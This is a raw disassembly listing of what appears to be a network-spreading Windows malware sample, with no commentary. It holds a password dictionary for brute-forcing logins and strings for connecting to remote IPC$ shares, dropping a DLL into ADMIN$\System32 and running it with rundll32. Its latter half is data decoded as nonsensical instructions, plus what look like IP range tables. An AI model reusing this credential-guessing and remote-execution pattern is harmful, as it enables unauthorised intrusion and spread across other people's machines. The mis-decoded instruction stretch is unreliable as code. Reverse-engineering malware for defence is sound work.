a654321 db '654321',0 ; DATA XREF: .text:009BA2A0�o
align 4
a54321 db '54321',0 ; DATA XREF: .text:009BA29C�o
align 4
a4321 db '4321',0 ; DATA XREF: .text:009BA298�o
align 4
a321 db '321',0 ; DATA XREF: .text:009BA294�o
a21 db '21',0 ; DATA XREF: .text:009BA290�o
align 4
a12 db '12',0 ; DATA XREF: .text:009BA28C�o
align 4
aFuck db 'fuck',0 ; DATA XREF: .text:009BA288�o
align 10h
aZzzzz db 'zzzzz',0 ; DATA XREF: .text:009BA284�o
align 4
aZzzz db 'zzzz',0 ; DATA XREF: .text:009BA280�o
align 10h
aZzz db 'zzz',0 ; DATA XREF: .text:009BA27C�o
aXxxxx db 'xxxxx',0 ; DATA XREF: .text:009BA278�o
align 4
aXxxx db 'xxxx',0 ; DATA XREF: .text:009BA274�o
align 4
aXxx db 'xxx',0 ; DATA XREF: .text:009BA270�o
aQqqqq db 'qqqqq',0 ; DATA XREF: .text:009BA26C�o
align 10h
aQqqq db 'qqqq',0 ; DATA XREF: .text:009BA268�o
align 4
aQqq db 'qqq',0 ; DATA XREF: .text:009BA264�o
aAaaaa db 'aaaaa',0 ; DATA XREF: .text:009BA260�o
align 4
aAaaa db 'aaaa',0 ; DATA XREF: .text:009BA25C�o
align 4
aAaa_0 db 'aaa',0 ; DATA XREF: .text:009BA258�o
aSql db 'sql',0 ; DATA XREF: .text:009BA254�o
aFile db 'file',0 ; DATA XREF: .text:009BA250�o
align 4
aWeb db 'web',0 ; DATA XREF: .text:009BA24C�o
aFoo db 'foo',0 ; DATA XREF: .text:009BA248�o
aJob db 'job',0 ; DATA XREF: .text:009BA244�o
aHome db 'home',0 ; DATA XREF: .text:009BA240�o
align 10h
aWork db 'work',0 ; DATA XREF: .text:009BA23C�o
align 4
aIntranet db 'intranet',0 ; DATA XREF: .text:009BA238�o
align 4
aController db 'controller',0 ; DATA XREF: .text:009BA234�o
align 10h
aKiller db 'killer',0 ; DATA XREF: .text:009BA230�o
align 4
aGames db 'games',0 ; DATA XREF: .text:009BA22C�o
align 10h
aPrivate db 'private',0 ; DATA XREF: .text:009BA228�o
aMarket db 'market',0 ; DATA XREF: .text:009BA224�o
align 10h
aCoffee db 'coffee',0 ; DATA XREF: .text:009BA220�o
align 4
aCookie db 'cookie',0 ; DATA XREF: .text:009BA21C�o
align 10h
aForever db 'forever',0 ; DATA XREF: .text:009BA218�o
aFreedom db 'freedom',0 ; DATA XREF: .text:009BA214�o
aStudent db 'student',0 ; DATA XREF: .text:009BA210�o
aAccount db 'account',0 ; DATA XREF: .text:009BA20C�o
aAcademia db 'academia',0 ; DATA XREF: .text:009BA208�o
align 4
aFiles db 'files',0 ; DATA XREF: .text:009BA204�o
align 4
aWindows db 'windows',0 ; DATA XREF: .text:009BA200�o
aMonitor db 'monitor',0 ; DATA XREF: .text:009BA1FC�o
aUnknown db 'unknown',0 ; DATA XREF: .text:009BA1F8�o
aAnything db 'anything',0 ; DATA XREF: .text:009BA1F4�o
align 4
aLetitbe db 'letitbe',0 ; DATA XREF: .text:009BA1F0�o
aLetmein db 'letmein',0 ; DATA XREF: .text:009BA1EC�o
aDomain db 'domain',0 ; DATA XREF: .text:009BA1E8�o
align 10h
aAccess db 'access',0 ; DATA XREF: .text:009BA1E4�o
align 4
aMoney db 'money',0 ; DATA XREF: .text:009BA1E0�o
align 10h
aCampus db 'campus',0 ; DATA XREF: .text:009BA1DC�o
align 4
aExplorer db 'explorer',0 ; DATA XREF: .text:009BA1D8�o
align 4
aExchange db 'exchange',0 ; DATA XREF: .text:009BA1D4�o
align 10h
aCustomer db 'customer',0 ; DATA XREF: .text:009BA1D0�o
align 4
aCluster db 'cluster',0 ; DATA XREF: .text:009BA1CC�o
aNobody db 'nobody',0 ; DATA XREF: .text:009BA1C8�o
align 4
aCodeword db 'codeword',0 ; DATA XREF: .text:009BA1C4�o
align 4
aCodename db 'codename',0 ; DATA XREF: .text:009BA1C0�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .text:009BA1BC�o
align 10h
aDesktop db 'desktop',0 ; DATA XREF: .text:009BA1B8�o
aSecurity db 'security',0 ; DATA XREF: .text:009BA1B4�o
align 4
aSecure db 'secure',0 ; DATA XREF: .text:009BA1B0�o
align 4
aPublic db 'public',0 ; DATA XREF: .text:009BA1AC�o
align 4
aSystem db 'system',0 ; DATA XREF: .text:009BA1A8�o
align 4
aShadow db 'shadow',0 ; DATA XREF: .text:009BA1A4�o
align 4
aOffice db 'office',0 ; DATA XREF: .text:009BA1A0�o
align 4
aSupervisor db 'supervisor',0 ; DATA XREF: .text:009BA19C�o
align 4
aSuperuser db 'superuser',0 ; DATA XREF: .text:009BA198�o
align 4
aShare db 'share',0 ; DATA XREF: .text:009BA194�o
align 4
aSuper db 'super',0 ; DATA XREF: .text:009BA190�o
align 4
aSecret db 'secret',0 ; DATA XREF: .text:009BA18C�o
align 4
aServer db 'server',0 ; DATA XREF: .text:009BA188�o
align 4
aComputer db 'computer',0 ; DATA XREF: .text:009BA184�o
align 10h
aOwner db 'owner',0 ; DATA XREF: .text:009BA180�o
align 4
aBackup db 'backup',0 ; DATA XREF: .text:009BA17C�o
align 10h
aDatabase db 'database',0 ; DATA XREF: .text:009BA178�o
align 4
aLotus db 'lotus',0 ; DATA XREF: .text:009BA174�o
align 4
aOracle db 'oracle',0 ; DATA XREF: .text:009BA170�o
align 4
aBusiness db 'business',0 ; DATA XREF: .text:009BA16C�o
align 4
aManager db 'manager',0 ; DATA XREF: .text:009BA168�o
aTemporary db 'temporary',0 ; DATA XREF: .text:009BA164�o
align 4
aIhavenopass db 'ihavenopass',0 ; DATA XREF: .text:009BA160�o
aNothing db 'nothing',0 ; DATA XREF: .text:009BA15C�o
aNopassword db 'nopassword',0 ; DATA XREF: .text:009BA158�o
align 4
aNopass db 'nopass',0 ; DATA XREF: .text:009BA154�o
align 4
aInternet db 'Internet',0 ; DATA XREF: .text:009BA150�o
align 10h
aInternet_0 db 'internet',0 ; DATA XREF: .text:009BA14C�o
align 4
aExample db 'example',0 ; DATA XREF: .text:009BA148�o
aSample db 'sample',0 ; DATA XREF: .text:009BA144�o
align 4
aLove123 db 'love123',0 ; DATA XREF: .text:009BA140�o
aBoss123 db 'boss123',0 ; DATA XREF: .text:009BA13C�o
aWork123 db 'work123',0 ; DATA XREF: .text:009BA138�o
aHome123 db 'home123',0 ; DATA XREF: .text:009BA134�o
aMypc123 db 'mypc123',0 ; DATA XREF: .text:009BA130�o
aTemp123 db 'temp123',0 ; DATA XREF: .text:009BA12C�o
aTest123 db 'test123',0 ; DATA XREF: .text:009BA128�o
aQwe123 db 'qwe123',0 ; DATA XREF: .text:009BA124�o
align 4
aAbc123 db 'abc123',0 ; DATA XREF: .text:009BA120�o
align 4
aPw123 db 'pw123',0 ; DATA XREF: .text:009BA11C�o
align 4
aRoot123 db 'root123',0 ; DATA XREF: .text:009BA118�o
aPass123 db 'pass123',0 ; DATA XREF: .text:009BA114�o
aPass12 db 'pass12',0 ; DATA XREF: .text:009BA110�o
align 4
aPass1 db 'pass1',0 ; DATA XREF: .text:009BA10C�o
align 4
aAdmin123 db 'admin123',0 ; DATA XREF: .text:009BA108�o
align 4
aAdmin12 db 'admin12',0 ; DATA XREF: .text:009BA104�o
aAdmin1 db 'admin1',0 ; DATA XREF: .text:009BA100�o
align 4
aPassword123 db 'password123',0 ; DATA XREF: .text:009BA0FC�o
aPassword12 db 'password12',0 ; DATA XREF: .text:009BA0F8�o
align 10h
aPassword1 db 'password1',0 ; DATA XREF: .text:009BA0F4�o
align 4
aDefault db 'default',0 ; DATA XREF: .text:009BA0F0�o
aFoobar db 'foobar',0 ; DATA XREF: .text:009BA0EC�o
align 4
aFoofoo db 'foofoo',0 ; DATA XREF: .text:009BA0E8�o
align 4
aTemptemp db 'temptemp',0 ; DATA XREF: .text:009BA0E4�o
align 10h
aTemp db 'temp',0 ; DATA XREF: .text:009BA0E0�o
align 4
aTesttest db 'testtest',0 ; DATA XREF: .text:009BA0DC�o
align 4
aTest db 'test',0 ; DATA XREF: .text:009BA0D8�o
align 4
aRootroot db 'rootroot',0 ; DATA XREF: .text:009BA0D4�o
align 4
aRoot db 'root',0 ; DATA XREF: .text:009BA0D0�o
align 10h
aAdminadmin db 'adminadmin',0 ; DATA XREF: .text:009BA0CC�o
align 4
aMypassword db 'mypassword',0 ; DATA XREF: .text:009BA0C8�o
align 4
aMypass db 'mypass',0 ; DATA XREF: .text:009BA0C4�o
align 10h
aPass db 'pass',0 ; DATA XREF: .text:009BA0C0�o
align 4
aLogin db 'Login',0 ; DATA XREF: .text:009BA0BC�o
align 10h
aLogin_0 db 'login',0 ; DATA XREF: .text:009BA0B8�o
align 4
aPassword db 'Password',0 ; DATA XREF: .text:009BA0B4�o
align 4
aPassword_0 db 'password',0 ; DATA XREF: .text:009BA0B0�o
align 10h
aPasswd db 'passwd',0 ; DATA XREF: .text:009BA0AC�o
align 4
aZxcvbn db 'zxcvbn',0 ; DATA XREF: .text:009BA0A8�o
align 10h
aZxcvb db 'zxcvb',0 ; DATA XREF: .text:009BA0A4�o
align 4
aZxccxz db 'zxccxz',0 ; DATA XREF: .text:009BA0A0�o
align 10h
aZxcxz db 'zxcxz',0 ; DATA XREF: .text:009BA09C�o
align 4
aQazwsxedc db 'qazwsxedc',0 ; DATA XREF: .text:009BA098�o
align 4
aQazwsx db 'qazwsx',0 ; DATA XREF: .text:009BA094�o
align 4
aQ1w2e3 db 'q1w2e3',0 ; DATA XREF: .text:009BA090�o
align 4
aQweasdzxc db 'qweasdzxc',0 ; DATA XREF: .text:009BA08C�o
align 10h
aAsdfgh db 'asdfgh',0 ; DATA XREF: .text:009BA088�o
align 4
aAsdzxc db 'asdzxc',0 ; DATA XREF: .text:009BA084�o
align 10h
aAsddsa db 'asddsa',0 ; DATA XREF: .text:009BA080�o
align 4
aAsdsa db 'asdsa',0 ; DATA XREF: .text:009BA07C�o
align 10h
aQweasd db 'qweasd',0 ; DATA XREF: .text:009BA078�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .text:009BA074�o
align 10h
aQweewq db 'qweewq',0 ; DATA XREF: .text:009BA070�o
align 4
aQwewq db 'qwewq',0 ; DATA XREF: .text:009BA06C�o
align 10h
aNimda db 'nimda',0 ; DATA XREF: .text:009BA068�o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: .text:009BA064�o
align 4
aAdmin db 'Admin',0 ; DATA XREF: .text:009BA060�o
align 10h
aAdmin_0 db 'admin',0 ; DATA XREF: .text:009BA05C�o
align 4
aA1b2c3 db 'a1b2c3',0 ; DATA XREF: .text:009BA058�o
align 10h
a1q2w3e db '1q2w3e',0 ; DATA XREF: .text:009BA054�o
align 4
a1234qwer db '1234qwer',0 ; DATA XREF: .text:009BA050�o
align 4
a1234abcd db '1234abcd',0 ; DATA XREF: .text:009BA04C�o
align 10h
a123asd db '123asd',0 ; DATA XREF: .text:009BA048�o
align 4
a123qwe db '123qwe',0 ; DATA XREF: .text:009BA044�o
align 10h
a123abc db '123abc',0 ; DATA XREF: .text:009BA040�o
align 4
a123321 db '123321',0 ; DATA XREF: .text:009BA03C�o
align 10h
a12321 db '12321',0 ; DATA XREF: .text:009BA038�o
align 4
a123123 db '123123',0 ; DATA XREF: .text:009BA034�o
align 10h
a1234567890 db '1234567890',0 ; DATA XREF: .text:009BA030�o
align 4
a123456789 db '123456789',0 ; DATA XREF: .text:009BA02C�o
align 4
a12345678 db '12345678',0 ; DATA XREF: .text:009BA028�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .text:009BA024�o
a123456 db '123456',0 ; DATA XREF: .text:009BA020�o
align 4
a12345 db '12345',0 ; DATA XREF: .text:009BA01C�o
align 4
a1234 db '1234',0 ; DATA XREF: .text:009BA018�o
align 4
a123 db '123',0 ; DATA XREF: .text:009BA014�o
; wchar_t aSIpc
aSIpc: ; DATA XREF: sub_cancel_connection_to_server+12�o
; sub_connect_to_server+13�o
unicode 0, <\\%s\IPC$>,0
; wchar_t Str
Str dw 0 ; DATA XREF: sub_connect_to_server+54�o
; sub_9AE195+1F4�o
align 10h
; wchar_t aS
aS: ; DATA XREF: sub_run_dll_remote_host+249�o
unicode 0, <\\%s>,0
align 4
; wchar_t aRundll32_exeSS
aRundll32_exeSS: ; DATA XREF: sub_run_dll_remote_host+230�o
unicode 0, <rundll32.exe %s,%s>,0
align 4
; wchar_t aSAdminSystem32
aSAdminSystem32: ; DATA XREF: sub_run_dll_remote_host+102�o
; sub_run_dll_remote_host+118�o
unicode 0, <\\%s\ADMIN$\System32\%s>,0
; wchar_t Str2
Str2: ; DATA XREF: sub_run_dll_remote_host+C2�o
; sub_run_dll_remote_host+E7�o
unicode 0, <dll>,0
; wchar_t a_
a_: ; DATA XREF: sub_run_dll_remote_host+8F�o
unicode 0, <.>,0
dword_9A2F60 dd 0C08956A1h, 11D11CD3h, 8000C5B1h, 0E27C15Fh ; DATA XREF: sub_9A9A64+8D�o
dword_9A2F70 dd 20404h, 0 ; DATA XREF: sub_9A9A64+3E�o
dd 0C0h, 46000000h
; IID rclsid
rclsid dd 5C63C1ADh ; Data1 ; DATA XREF: sub_9A9C0D+49�o
dw 3956h ; Data2
dw 4FF8h ; Data3
db 84h, 86h, 40h, 3, 47h, 58h, 31h, 5Bh; Data4
; IID riid
riid dd 0C08956B7h ; Data1 ; DATA XREF: sub_9A9C0D+41�o
dw 1CD3h ; Data2
dw 11D1h ; Data3
db 0B1h, 0C5h, 0, 80h, 5Fh, 0C1h, 27h, 0Eh; Data4
stru_9A2FA0 _msEH <0FFFFFFFFh, offset loc_9A9C7F, offset loc_9A9C83>
; DATA XREF: sub_9A9C0D+2�o
align 10h
dword_9A2FB0 dd 510CDD60h ; DATA XREF: sub_9A9DA6:loc_9A9DC3�r
dword_9A2FB4 dd 510CDD7Fh ; DATA XREF: sub_9A9DA6+25�r
db 0
db 68h, 0C7h, 5Bh
; ---------------------------------------------------------------------------
jmp fword ptr [eax-39h]
; ---------------------------------------------------------------------------
db 5Bh
db 0
db 0D1h, 58h, 0C0h
db 0FFh
db 0D1h, 58h, 0C0h
db 0
db 58h, 0F2h, 0CFh
db 0FFh
db 58h, 0F2h, 0CFh
db 0C0h ;
db 2Bh, 2Ah, 0Ch
db 0C7h ;
db 2Bh, 2Ah, 0Ch
db 0
db 0B5h, 84h, 43h
db 0FFh
db 0B5h, 84h, 43h
db 0
db 34h, 77h, 42h
db 0FFh
db 34h, 77h, 42h
db 0
db 0C4h, 17h, 0D0h
db 7Fh ;
db 0C4h, 17h, 0D0h
db 0
align 2
retf 0FF8Dh
; ---------------------------------------------------------------------------
db 0FFh, 0CAh, 8Dh
db 0
align 2
dw 8277h
db 0FFh
db 0FFh, 77h, 82h
db 0
align 2
dw 8A2Ah
db 0FFh
; ---------------------------------------------------------------------------
jmp fword ptr [edx]
; ---------------------------------------------------------------------------
db 8Ah
db 0
align 2
dw 82C8h
db 0FFh
db 0FFh, 0C8h, 82h
db 0
align 2
dw 9B23h
db 0FFh
; ---------------------------------------------------------------------------
jmp dword ptr [ebx]
; ---------------------------------------------------------------------------
db 9Bh
db 0
db 0A7h, 0A6h, 0CDh
; ---------------------------------------------------------------------------
jmp dword ptr [edi+3900CDA6h]
; ---------------------------------------------------------------------------
dw 0D0D4h
db 0FFh
db 39h, 0D4h, 0D0h
db 0
db 98h, 0D4h, 0D0h
db 0FFh
db 9Bh, 0D4h, 0D0h
db 0
db 40h, 0F2h, 0D0h
db 0FFh
db 41h, 0F2h, 0D0h
db 0
db 85h, 0F3h, 0D0h
db 1Fh
db 85h, 0F3h, 0D0h
db 80h ;
db 0E7h, 0F5h, 0D0h
db 9Fh ;
db 0E7h, 0F5h, 0D0h
aPAPASp?Sp? db 'AߏAp?ϙp?',0
db 0DAh, 7Dh, 3Fh
db 0FFh
db 0DAh, 7Dh, 3Fh
db 80h ;
db 3Dh, 0D2h, 41h
db 0BFh ;
db 3Dh, 0D2h, 41h
db 40h ; @
db 2Dh, 0CEh, 41h
db 7Fh ;
; ---------------------------------------------------------------------------
sub eax, 0E0041CEh
test byte ptr [ecx-1], 0Eh
test byte ptr [ecx+0], 28h
jbe short loc_9A30BB
jmp fword ptr [ecx]
; ---------------------------------------------------------------------------
dw 3F76h
dd 3F763400h, 3F7637FFh, 41C8A5C8h, 41C8A5CFh, 0D0FD98D0h
dd 0D0FD98DFh, 0D0FFD858h, 0D0FFD85Fh, 0CEBC0E80h, 0CEBC0EBFh
dd 0CEBC0EC0h, 0CEBC0EFFh, 41D8F660h, 41D8F667h
byte_9A30B8 db 80h, 53h, 11h ; CODE XREF: .text:009A30EA�j
; ---------------------------------------------------------------------------
loc_9A30BB: ; CODE XREF: .text:009A307A�j
int 3 ; Trap to Debugger
loc_9A30BC: ; CODE XREF: .text:009A30EE�j
mov edi, 0CC1153h
mov dh, 0E8h
sar bh, 1
mov dh, 0E8h
rol byte ptr [eax-2F17A9h], 1
push edi
call near ptr 20A189A3h
dec eax
pop edi
pop es
and [eax-28h], cl
mov esi, 0BEDF45E1h
loope near ptr loc_9A3120+5
pusha
pop ss
out 45h, al
db 67h
pop ss
out 45h, al
pusha
pop ss
jbe short near ptr byte_9A30B8
jg short loc_9A3105
jbe short loc_9A30BC
add ah, dl
enter 0FFFFFF41h, 0D4h
enter 41h, 91h
; ---------------------------------------------------------------------------
dw 0C162h
; ---------------------------------------------------------------------------
call dword ptr [ecx-75EF3E9Eh]
pop ss
aam 1Fh
loc_9A3105: ; CODE XREF: .text:009A30EC�j
mov dl, [edi]
aam 48h
nop
out dx, eax
push eax
dec edi
nop
out dx, eax
push eax
call near ptr 0F06F314Dh
cmp [eax], al
aad 90h
imul eax, [eax], -2Bh
xchg eax, edi
imul eax, [eax], -2Bh
loc_9A3120: ; CODE XREF: .text:009A30DE�j
shr byte ptr ds:0B52CC70Ch[esi*4], 0Ch
mov al, 1Dh
mov eax, 0B81DBF0Ch
or al, 0
cmp byte ptr [ebx-447F0040h], 0C0h
add [eax-7F003F45h], al
mov ebx, 2417B0C0h
or al, 0BFh
pop ss
and al, 0Ch
add [esi], ah
cwde
or al, 7Fh
db 26h
cwde
or al, 30h
mov dword ptr [ecx], 29C73740h
inc eax
add [edi-6800BFD7h], dl
loc_9A315E: ; CODE XREF: .text:009A31D0�j
sub [eax-18h], eax
test al, 29h ; CODE XREF: .text:009A31D4�j
inc eax
out dx, eax
test al, 29h
inc eax
xor al, ch
pop es
sar byte ptr [edi], 1
call near ptr 461B0179h
bound eax, [ebx-61h]
inc ebp
bound eax, [ebx+40h]
dec eax
bound eax, [ebx+5Fh]
dec eax
bound eax, [ebx-60h]
xchg eax, ebp
pop edx
aas
mov edi, 3F5A95h
push eax
popa
inc ebx
call dword ptr [ecx+61h]
inc ebx
inc eax
adc eax, 157F41D8h
fadd dword ptr [ecx-70h]
cmp edx, esi
dec eax
xchg eax, edi
cmp edx, esi ; CODE XREF: .text:009A31C1�j
dec eax
and [eax+58h], ch ; CODE XREF: .text:009A31C5�j
inc esp
daa
push 0F2C04458h
mov [ebx-39h], ah
repne mov [ebx-28h], ah
push edx
pop ecx
inc esp
fist word ptr [edx+59h]
inc esp
add [ecx], al
push esp
fdivr st, st(7)
add [eax+ebx*8+48h], edx
jno short near ptr loc_9A319D+1
inc ebp
dec edi
jno short near ptr loc_9A31A0+2
inc ebp
adc byte ptr ds:3514874Bh[esi], 4Bh
jo short loc_9A315E
pop ebp
inc edx
ja short near ptr loc_9A3161+1
pop ebp
inc edx
rcl byte ptr [esi], 5Ch
inc edx
iret
; ---------------------------------------------------------------------------
db 16h, 5Ch, 42h
db 0A0h ;
db 0E8h, 41h, 3Fh
db 0AFh ;
db 0E8h, 41h, 3Fh
db 90h
db 0E8h, 41h, 3Fh
db 97h ;
db 0E8h, 41h, 3Fh
db 30h ; 0
db 3Ch, 48h, 44h
db 37h ; 7
db 3Ch, 48h, 44h
db 80h ;
db 95h, 5Ah, 3Fh
db 9Fh ;
db 95h, 5Ah, 3Fh
db 70h ; p
db 5Dh, 41h, 3Fh
db 7Fh ;
db 5Dh, 41h, 3Fh
db 0
db 5Eh, 41h, 3Fh
db 0Fh
aA?A?oA?A?A? db '^A?`^A?o^A?(ܼ/ܼ^A?^A?',0
db 46h, 8Fh, 0D8h
db 0FFh
db 47h, 8Fh, 0D8h
db 0B0h ;
db 97h, 0E1h, 46h
db 0B7h ;
db 97h, 0E1h, 46h
db 0
align 2
dw 836Bh
db 0FFh
; ---------------------------------------------------------------------------
jmp fword ptr [ebx-7Dh]
; ---------------------------------------------------------------------------
db 0
db 5Ah, 5Ch, 0C0h
db 0FFh
db 5Ah, 5Ch, 0C0h
db 0
db 0E8h, 69h, 0C6h
db 0FFh
; ---------------------------------------------------------------------------
jmp short loc_9A32B8
; ---------------------------------------------------------------------------
db 0C6h
dd 0CCE73A00h, 0CCE73AFFh, 0CC8C4D00h, 0CC8C4DFFh, 0CC8C5000h
dd 0CC8C53FFh, 0C73C1C00h, 0C73C1CFFh, 0C7675A00h, 0C7675BFFh
dd 0C7677A00h, 0C7677AFFh, 0CC4F6500h, 0CC4F65FFh, 0C0ED4300h
dd 0C0ED43FFh, 0C6896100h, 0C68961FFh, 0CC4F8700h, 0CC4F87FFh
dd 0CC4FB300h, 0CC4FB3FFh, 0CC4FB400h, 0CC4FB5FFh, 0CC4FBC00h
dd 0CC4FBCFFh
; ---------------------------------------------------------------------------
loc_9A32B8: ; CODE XREF: .text:009A324D�j
add bl, al
dec edi
int 3 ; Trap to Debugger
inc ebp
dec edi
int 3 ; Trap to Debugger
add [esi+eax-39h], bl
call fword ptr [esi+6]
mov dword ptr [eax], 0FFCC4F07h
pop es
dec edi
int 3 ; Trap to Debugger
add [ebx], bl
dec edi
int 3 ; Trap to Debugger
call fword ptr [ebx]
dec edi
int 3 ; Trap to Debugger
add [edx-4Ch], cl
mov bh, 4Bh
mov ah, 0C6h
add [edi-4Ch], bl
mov bh, 61h
mov ah, 0C6h
add ah, ch
out 0CCh, eax ; DMA controller, 8237A-5.
; clear byte pointer flip-flop.
; ---------------------------------------------------------------------------
db 0FFh
db 0ECh, 0E7h, 0CCh
db 0
db 0Ah, 0F8h, 0CDh
db 0FFh
db 0Fh, 0F8h, 0CDh
db 0
db 3Fh, 0A3h, 0CDh
db 0FFh
db 3Fh, 0A3h, 0CDh
db 0
db 3Eh, 0A3h, 0CDh
db 0FFh
db 3Eh, 0A3h, 0CDh
db 0
align 2
dw 0CDA3h
db 0FFh
db 9Fh, 0A3h, 0CDh
db 0
db 29h, 0F8h, 0CDh
; ---------------------------------------------------------------------------
jmp fword ptr [ebx]
; ---------------------------------------------------------------------------
dw 0CDF8h
db 0
db 32h, 0F8h, 0CDh
db 0FFh
db 33h, 0F8h, 0CDh
db 0
db 3Dh, 0F8h, 0CDh
db 0FFh
db 3Fh, 0F8h, 0CDh
db 0
db 48h, 0F8h, 0CDh
db 0FFh
db 48h, 0F8h, 0CDh
db 0
db 0D4h, 0F8h, 0CDh
db 0FFh
db 0D7h, 0F8h, 0CDh
db 0
db 0E4h, 0F8h, 0CDh
; ---------------------------------------------------------------------------
jmp esp
; ---------------------------------------------------------------------------
dw 0CDF8h
db 0
db 0EBh, 0F8h, 0CDh
db 0FFh
db 0EBh, 0F8h, 0CDh
db 0
db 4Ch, 0E7h, 0CCh
db 0FFh
db 4Ch, 0E7h, 0CCh
db 0
db 0C0h, 0E7h, 0CCh
db 0FFh
db 0C0h, 0E7h, 0CCh
db 0
; ---------------------------------------------------------------------------
retn 0CCE7h
; ---------------------------------------------------------------------------
db 0FFh
db 0DFh, 0E7h, 0CCh
db 0
db 50h, 4Eh, 0CFh
db 0FFh
db 50h, 4Eh, 0CFh
db 0
db 51h, 4Eh, 0CFh
db 0FFh
db 51h, 4Eh, 0CFh
db 0
db 52h, 4Eh, 0CFh
db 0FFh
db 52h, 4Eh, 0CFh
db 0
db 0F3h, 0F8h, 0CDh
db 0FFh
db 0F4h, 0F8h, 0CDh
db 0
db 3, 75h, 0CFh
db 0FFh
db 3, 75h, 0CFh
db 0
db 75h, 12h, 0CFh
db 0FFh
db 75h, 12h, 0CFh
db 0
; ---------------------------------------------------------------------------
sbb ecx, [ebx-74E40030h]
rol byte ptr [eax], 1
aad 1Ch
sar edi, 1
aad 1Ch
rol dword ptr [eax], 1
inc esp
ror edi, 1
inc dword ptr [ecx+edx*8-31h]
add [eax+5Fh], ah
int 3 ; Trap to Debugger
jmp fword ptr [edi+5Fh]
; ---------------------------------------------------------------------------
align 10h
db 0C0h ;
db 5Dh, 9Eh, 0CFh
db 0DFh ;
db 5Dh, 9Eh, 0CFh
db 0C0h ;
db 7Bh, 0F0h, 0CFh
db 0DFh ;
db 7Bh, 0F0h, 0CFh
db 0
db 0CDh, 1Ah, 0D0h
db 0FFh
db 0CDh, 1Ah, 0D0h
db 0
db 9Dh, 0C5h, 0C0h
; ---------------------------------------------------------------------------
call fword ptr [ebp-18FF3F3Bh]
test ecx, esp
jmp edi
; ---------------------------------------------------------------------------
dw 0CC85h
db 0
db 60h, 48h, 0D8h
; ---------------------------------------------------------------------------
jmp dword ptr [ebx+48h]
; ---------------------------------------------------------------------------
db 0D8h
db 98h ;
db 0A6h, 0E5h, 0CFh
db 9Fh ;
db 0A6h, 0E5h, 0CFh
db 0
; ---------------------------------------------------------------------------
xchg eax, ebp
pop edi
int 3 ; Trap to Debugger
call dword ptr [ebp-2AB733A1h]
rcl cl, 4Fh
aad 0C0h
rol dword ptr [eax], 1
retf
; ---------------------------------------------------------------------------
dw 0CE49h
db 0FFh
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
dw 0CE49h
db 0
db 76h, 49h, 0CEh
db 0FFh
db 76h, 49h, 0CEh
db 10h
db 36h, 2Dh, 0D0h
db 17h
db 36h, 2Dh, 0D0h
db 8
db 36h, 2Dh, 0D0h
db 0Fh
db 36h, 2Dh, 0D0h
db 0
db 1Fh, 49h, 0CEh
db 0FFh
db 1Fh, 49h, 0CEh
db 80h ;
db 32h, 0A1h, 3Fh
db 0FFh
db 32h, 0A1h, 3Fh
db 0
db 32h, 0A1h, 3Fh
db 7Fh ;
db 32h, 0A1h, 3Fh
db 0E0h ;
db 8, 0F0h, 0CFh
dword_9A3434 dd 0CFF008EFh, 9D360000h, 9D3CFFFFh, 0D02D59F8h, 0D02D59FFh
dd 0CEB64500h, 0CEB645FFh, 0CEB6F000h, 0CEB6F0FFh, 0CEB6F100h
dd 0CEB6F1FFh, 0CE494300h, 0CE4943FFh, 0CEB6FB00h, 0CEB6FBFFh
dd 0CEB6F700h, 0CEB6F7FFh, 0CEB6EC00h, 0CEB6ECFFh, 3FECC640h
dd 3FECC647h, 3FECC698h, 3FECC69Fh, 0A579FDE8h, 0A579FDEFh
dd 3FECAA40h, 3FECAA47h, 3FECBA40h, 3FECBA47h, 3FECBB68h
dd 3FECBB6Fh, 3FECBB80h, 3FECBB87h, 3FECBBA0h, 3FECBBA7h
dd 0C7028900h, 0C70289FFh, 0D8DE68E0h, 0D8DE68EFh, 3F975740h
dd 3F975747h, 404D5260h, 404D5267h, 404D5D50h, 404D5D5Fh
dd 41340000h, 4137FFFFh, 0CF2E0000h, 0CF2EFFFFh, 836B0000h
dd 836BFFFFh, 0CF448000h, 0CF44CFFFh, 0CCB69000h, 0CCB69FFFh
dd 0CE6B2200h, 0CE6B22FFh, 0CDF09E00h, 0CDF09FFFh, 0CC4FFC00h
dd 0CC4FFCFFh, 40C8D310h, 40C8D31Fh, 0CB2A300h, 0CB2A31Fh
dd 452C7E50h, 452C7E5Fh, 3FAD2A80h, 3FAD2AFFh, 0C1C6C00h
dd 0C1C6C7Fh, 41AA1D00h, 41AA1D07h, 43848560h, 43848567h
dd 806B000h, 806B0FFh, 0CDF85000h, 0CDF881FFh, 3F947BF0h
dd 3F947BF7h, 4029C100h, 4029C1FFh, 40554620h, 4055462Fh
dd 40555160h, 40555167h, 40555168h, 4055516Fh, 0D820A8E0h
dd 0D820A8FFh, 0CE4F4A20h, 0CE4F4A2Fh, 0D820AFE0h, 0D820AFFFh
dd 0D820B400h, 0D820B7FFh, 0D821E5E0h, 0D821E5FFh, 0D821EC00h
dd 0D821EFFFh, 0D821F000h, 0D821F3FFh, 0D820F000h, 0D820F3FFh
dd 0D8223300h, 0D82233FFh, 0D1017000h, 0D10170FFh, 0D1017100h
dd 0D10171FFh, 0D1010F00h, 0D1010FFFh, 0D82235B0h, 0D82235BFh
dd 0D82308E0h, 0D82308EFh, 0D1B98000h, 0D1B983FFh, 4172AF80h
dd 4172AF9Fh, 400FE560h, 400FE57Fh, 400FB100h, 400FB1FFh
dd 400FAAC0h, 400FAAC7h, 0D18FEE00h, 0D18FEEFFh, 400FB200h
dd 400FB2FFh, 4223D178h, 4223D17Fh, 4223D380h, 4223D3BFh
dd 4223D030h, 4223D03Fh, 0D8219400h, 0D82197FFh, 0D8234258h
dd 0D823425Fh, 0CE620A0h, 0CE620A7h, 0C357C00h, 0C357C1Fh
dd 0CE81260h, 0CE8127Fh, 0CBE9E00h, 0CBE9EFFh, 0C47C420h
dd 0C47C42Fh, 0D1F0C000h, 0D1F0DFFFh, 46250000h, 4625BFFFh
dd 0C3157C0h, 0C3157FFh, 4A5DCD90h, 4A5DCD97h, 4A5DCD98h
dd 4A5DCD9Fh, 4A5DCE40h, 4A5DCE47h, 46598B78h, 46598B7Fh
dd 0CE477700h, 0CE4777FFh, 0CE477500h, 0CE4775FFh, 0CE477600h
dd 0CE4776FFh, 0D19A9B70h, 0D19A9B77h, 41443E98h, 41443E9Fh
